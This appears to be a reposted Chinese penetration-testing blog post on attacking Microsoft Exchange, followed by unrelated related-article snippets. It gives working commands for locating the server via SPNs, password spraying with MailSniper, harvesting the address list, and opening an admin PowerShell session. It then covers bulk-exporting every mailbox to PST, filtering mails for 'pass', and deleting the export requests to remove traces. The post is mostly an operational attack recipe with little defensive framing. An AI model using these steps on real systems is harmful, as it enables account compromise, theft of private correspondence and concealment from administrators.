exchange实战

news2024/11/23 4:46:25

未得到exchange服务器权限

确定exchange服务器ip地址

setspn -T example.domain.com -F -Q */* | findstr exchange

在这里插入图片描述

MailSniper

爆破用户名和密码
爆破Exchange邮箱用户名密码,为了防止账号被锁定,所以我们使用密码喷洒攻击,即只使用一个密码来碰撞用户名

Invoke-PasswordSprayEWS -ExchHostname WIN-R6M7IQRLCGA.hdh.com -UserList user.txt -Password xxxxxx -Threads 10 

在这里插入图片描述
在这里插入图片描述
成功爆破出密码,但是我结果写入文件失败了,这些报错不知道怎么回事,不过可以正常爆破密码
而且用户名格式不一样也能爆破出来,就是结果导出有问题
在这里插入图片描述
获取邮箱通讯录
在获取一个邮箱账号密码后,可以使用MailSniper收集通讯录,当拿到通讯录后,可以再次利用上述爆破手段继续尝试弱密码,但是记住,密码次数不要太多,很有可能会造成域用户锁定
Get-GlobalAddressList -ExchHostname WIN-R6M7IQRLCGA.hdh.com -UserName hdh\wahaha -Password xxxxxx -OutFile address-list.txt
在这里插入图片描述
这样用户就枚举出来了

得到exchange服务器权限后

使用PSSession连接Exchange服务器

$User = "hdh\administrator"
$Pass = ConvertTo-SecureString -AsPlainText xxxxxxx -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://WIN-R6M7IQRLCGA.hdh.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

在这里插入图片描述
查看PSSession

Get-PSSession

删除PSSession

Remove-PSSession $Session

测试命令(获得所有邮箱用户):

#获得所有用户
Get-Mailbox

以下是在exchange服务器上进行操作的没有使用远程PSSession去执行,实战中需要PSSession去执行

导出数据及其清除

页面导出在这里插入图片描述
exchange shell导出
1.将用户添加到角色组”Mailbox Import Export”
在这里插入图片描述
2.重新启动exchange shell
否则不能使用New-MailboxexportRequest
3.导出邮件并保存
(1)导出指定用户的所有邮件,保存到Exchange服务器的c:\test

$User = "administrator"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

在这里插入图片描述
(2)筛选出指定用户的wahaha中包含单词pass的邮件,保存到Exchange服务器的c:\test

$User = "wahaha"
New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\test\"+$User+".pst")

在这里插入图片描述
(3)导出所有邮件,保存到Exchange服务器的c:\test

Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\test\"+($_.name)+".pst")}

在这里插入图片描述
可以看到wahaha时间不是最新,因为wahaha不在Users组中,在安全组中

查看邮件导出请求

#粗略查看
Get-MailboxExportRequest

在这里插入图片描述

#精准查看
Get-MailboxExportRequest|fl

在这里插入图片描述
删除具体的某个导出请求:(以上图第一个wahaha为例)
注意:这两个命令依次输入才可以成功删除,截图未全

Remove-MailboxExportRequest -RequestQueue "Mailbox Database 1864638920" -RequestGuid 7c9ca813-22b5-43e7-84f5-0fe69682bea3 -Confirm:$false
Remove-MailboxExportRequest -Identity 'hdh.com/Microsoft Exchange Security Groups/wahaha\MailboxExport' -Confirm:$false

在这里插入图片描述
可以看到wahaha的Mailbox Database 1864638920删除请求已经删掉
删除所有导出请求

Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false

在这里插入图片描述
可以看到全部删除成功

查看指定人指定日期内邮件

#查看发件人administrator@hdh.com2019119:00至今发送的所有邮件的相关信息(包括发件人,收件人和邮件主题)Get-MessageTrackingLog -Start "01/11/2019 09:00:00" -Sender "administrator@hdh.com"

在这里插入图片描述
参考:https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/942276.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Windows上安装Hadoop 3.x

目录 0. 安装Java 1. 安装Hadoop 1.1 下载Hadoop 1.2 下载winutils 2. 配置Hadoop 1. hadoop-env.cmd 2. 创建数据目录 3. core-site.xml 4. hdfs-site.xml 3. 启动测试 3.1 namenode格式化 3.2 启动Hadoop 3.3 查看webui 3.4 测试hdfs 3.5. 测试MapReduce 4. 还…

构建个人博客_Obsidian_github.io_hexo

1 初衷 很早就开始分享文档,以技术类的为主,一开始是 MSN,博客,随着平台的更替,后来又用了 CSDN,知乎,简书…… 再后来是 Obsidian,飞书,Notion,常常有以下困…

《Flink学习笔记》——第八章 状态管理

8.1 Flink中的状态 8.1.1 概述 在Flink中,算子任务可以分为无状态和有状态两种情况。 **无状态的算子:**每个事件不依赖其它数据,自己处理完就输出,也不需要依赖中间结果。例如:打印操作,每个数据只需要…

【PLSQL】PLSQL基础

文章目录 一:记录类型1.语法2.代码实例 二:字符转换三:%TYPE和%ROWTYPE1.%TYPE2.%ROWTYPE 四:循环1.LOOP2.WHILE(推荐)3.数字式循环 五:游标1.游标定义及读取2.游标属性3.NO_DATA_FOUND和%NOTFO…

释放 ChatGPT 的价值:5 个专家提示

随着近来ChatGPT的热议,人工智能技术被推上风口浪尖,由此以数字化技术为基础的数字营销也再次受到了不小的关注,但是营销的本质从来都没有变过,今天我们聊下ChatGPT无论如何演进,人工智能无论变得多么先进,…

设计模式—外观模式(Facade)

目录 一、什么是外观模式? 二、外观模式具有什么优点吗? 三、外观模式具有什么缺点呢? 四、什么时候使用外观模式? 五、代码展示 ①、股民炒股代码 ②、投资基金代码 ③外观模式 思维导图 一、什么是外观模式?…

《Flink学习笔记》——第四章 Flink运行时架构

4.1 系统架构 Flink运行时架构 Flink 运行时由两种类型的进程组成:一个 JobManager 和一个或者多个 TaskManager。 1、作业管理器(JobManager) JobManager是一个Flink集群中任务管理和调度的核心,是控制应用执行的主进程。也就…

Java之API详解之Object类的详细解析

4 Object类 4.1 概述 tips:重点讲解内容 查看API文档,我们可以看到API文档中关于Object类的定义如下: Object类所在包是java.lang包。Object 是类层次结构的根,每个类都可以将 Object 作为超类。所有类都直接或者间接的继承自该类…

JavaScript设计模式(二)——简单工厂模式、抽象工厂模式

个人简介 👀个人主页: 前端杂货铺 🙋‍♂️学习方向: 主攻前端方向,正逐渐往全干发展 📃个人状态: 研发工程师,现效力于中国工业软件事业 🚀人生格言: 积跬步…

网络防御和入侵检测

网络防御和入侵检测是维护网络安全的关键任务,可以帮助识别和阻止未经授权的访问和恶意行为。以下是一些基本的步骤和方法,用于进行网络防御和入侵检测。 网络防御: 防火墙设置: 部署防火墙来监控和控制网络流量,阻止…

禅道后台命令执行漏洞 (二)

漏洞简介 禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。禅道管理思想注重实效,功能完备丰富,操…

多线程基础篇

我们平常说的一个程序,一个程序中有声音,图片,字幕 实际上是一个进程中有多个线程 main线程是主线程。 多核,多个cpu,多个线程,切换的很快 单核的话是一个cpu,某一时间只能是一个线程,但是因为…

NLNet、GCNet、RTNet三种多头注意力网络的对比与分析

目录 一、中心思想 二、网络结构的异同点 三、网络结构的改进 3.1 GCNet的改进 3.2 RTNet的改进 四、总结 一、中心思想 三种网络最终目的都是为了捕获远程依赖关系或是全局上下文信息以增强目标检测或是目标分割的效果。 NLNet:卷积运算只能一次处理一个局…

C#,《小白学程序》第七课:列表(List)应用之一“编制高铁车次信息表”

1 文本格式 /// <summary> /// 车站信息类 class /// </summary> public class Station { /// <summary> /// 编号 /// </summary> public int Id { get; set; } 0; /// <summary> /// 车站名 /// </summary>…

17.CSS发光按钮悬停特效

效果 源码 <!DOCTYPE html> <html> <head><title>CSS Modern Button</title><link rel="stylesheet" type="text/css" href="style.css"> </head> <body><a href="#" style=&quo…

【Go 基础篇】探索Go语言中Map的神奇操作

嗨&#xff0c;Go语言的学习者们&#xff01;在编程世界中&#xff0c;Map是一个强大而又有趣的工具&#xff0c;它可以帮助我们高效地存储和操作键值对数据。Map就像是一本字典&#xff0c;可以让我们根据关键字&#xff08;键&#xff09;快速找到对应的信息&#xff08;值&a…

Windows版本Docker安装详细步骤

文章目录 下载地址安装异常处理docker desktop requires a newer wsl 下载地址 https://desktop.docker.com/win/stable/Docker%20Desktop%20Installer.exe 安装 双击下载的文件Docker Desktop Installer.exe进行安装 点击OK 开始安装 安装完成点击Close and restart&…

JavaScript—面向对象、作用域

C#&#xff1a;从类继承 js&#xff1a;从对象继承 什么叫继承&#xff1f; 模板&#xff08;类&#xff09; 原型继承&#xff08;实体&#xff09; 有一个对象存在&#xff0c;构造函数设置原型为这个对象 创建出来的对象就继承与这个对象&#xff08;从对象那里继承&am…

ElasticSearch基础知识汇总

文章目录 前言一、认识ElasticSearch1.正向索引和倒排索引2. MySql与ElasticSearc3.IK分词器 二、ES索引库操作1.mapping映射属性2.索引库的CRUD 三、ES文档库操作 前言 Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎&#xff0c;基…

Kali Linux进行移动应用安全测试

使用Kali Linux进行移动应用安全测试是一项关键任务&#xff0c;可以帮助识别和修复移动应用中的安全漏洞。以下是一个基本的步骤指南&#xff0c;展示如何在Kali Linux中进行移动应用安全测试。 步骤&#xff1a; 准备环境&#xff1a; 确保 已经安装了Kali Linux&#xff0c…